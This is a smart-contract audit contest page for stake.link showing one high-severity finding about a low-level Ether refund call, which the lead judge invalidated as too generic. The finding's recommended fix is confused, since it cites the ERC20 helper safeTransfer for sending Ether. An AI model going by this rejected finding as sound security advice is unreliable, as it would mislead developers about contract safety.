stake.link

DeFiHardhatBridge

27,500 USDC

View results

Previous Next

Submission Details

Severity: high

Invalid

Use of low-level call to transfer Ether

cheatc0d3

The line of code in question is a low-level call to transfer Ether:

(bool success, ) = _sender.call{value: msg.value - fees}("");

This line is intended to refund any excess Ether sent to the contract when paying for fees natively (i.e., not using LINK tokens). The _sender variable represents the address that initiated the transfer and is supposed to receive the refund.

The issue here is that the _sender address is being used in a low-level call without any function selector. This could be manipulated if the _sender address is a contract that has a fallback function designed to perform malicious actions. Since the _sender is derived from user input (in the onTokenTransfer function), a malicious user could potentially exploit this by interacting with the contract using a malicious contract address as _sender.

To mitigate this risk, the contract should use safeTransfer or transfer instead of a low-level call to send Ether. These methods are safer because they limit the amount of gas forwarded to the recipient, reducing the risk of reentrancy attacks.

Updates

Lead Judging Commences

0kage Lead Judge over 1 year ago

Submission Judgement Published

Invalidated

Reason: Too generic

Prize pool breakdown

Total prize

27,500 USDC

nSLOC

1,414

19 USDC / LOC

High Medium

25,000 USDC

Low

2,500 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.